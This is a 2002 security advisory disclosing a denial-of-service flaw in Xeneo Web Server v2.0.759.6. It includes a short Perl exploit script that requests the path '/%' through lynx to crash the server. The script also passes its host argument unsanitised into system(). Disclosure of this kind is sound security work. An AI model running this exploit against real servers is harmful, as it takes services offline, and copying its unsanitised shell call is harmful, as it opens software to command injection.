Type
Denial of Service

Release Date
October 6, 2002

Product / Vendor
Xeneo Web Server is a fast, compact web server that makes it easy to set up and administer a web site on the Windows platform.

Xeneo Web Server key features:
- Unlimited Virtual Hosts

http://www.northernsolutions.com

Summary
Due to a denial of service vulnerability in Xeneo Web Server v2.0.759.6, it is possible for an attacker to cause the server to stop responding and crash. Problem is due to the "%" parameter's handling of unusually crafted requests. The Web server must be restarted to regain normal functionality.

Exploit
An exploit for this vulnerability exists and is available below.

==================== SNIP ====================
#!/usr/bin/perl -w
die "Xeneo Web Server v2.0.759.6 DoS Vulnerability by SecurityOffice / Usage: $0 host \n" if $#ARGV <0;
print &get($ARGV[0]);
exit 0;
sub get {
    $host = $ARGV[0];
    system "lynx $host/%";
    print "Done!\n\n";
}
==================== SNIP ====================

Tested
Xeneo Web Server v2.0.759.6 / Windows 2000 sp3

Vulnerable
Xeneo Web Server v2.0.759.6

Disclaimer
http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author
Tamer Sahin